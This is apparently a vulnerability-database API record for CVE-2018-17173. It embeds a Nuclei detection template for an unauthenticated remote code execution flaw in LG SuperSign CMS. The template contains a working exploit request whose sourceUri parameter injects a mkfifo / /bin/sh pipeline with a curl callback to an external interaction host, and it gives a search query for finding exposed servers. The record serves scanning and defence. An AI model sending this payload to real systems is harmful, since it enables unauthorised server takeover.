{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-17173/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-17173/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-17173/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-17173/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-17173/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-17173"},"sightings":{"href":"/api/v1/sightings/cve-2018-17173"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-17173.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-17173\n\ninfo:\n  name: LG Supersign EZ CMS - Remote Code Execution\n  author: pussycat0x\n  severity: critical\n  description: |\n    LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.\n  impact: |\n    Unauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems.\n  remediation: |\n    Upgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173.\n  reference:\n    - http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html\n    - http://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.html\n    - https://www.exploit-db.com/exploits/45448/\n    - https://www.exploit-db.com/exploits/46795/\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-17173\n    cwe-id: CWE-94\n    epss-score: 0.56237\n    epss-percentile: 0.99006\n    cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: lg\n    product: supersign_cms\n    fofa-query: title=\"LG SuperSign\"\n  tags: cve,cve2018,lg,supersign-cms,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /qsr_server/device/getThumbnail?sourceUri=\\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n          - \"dns\"\n        condition: or\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: curl\"\n# digest: 4b0a00483046022100f643613cab69470bb6e0e3186ef7a4d38df84d5c59f966c38462af2e7ebce03602210085a4b6a6560e13064e4e6fdedcc5e369e2023d48f143c9bda8203651fbac2e26:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2018-17173"}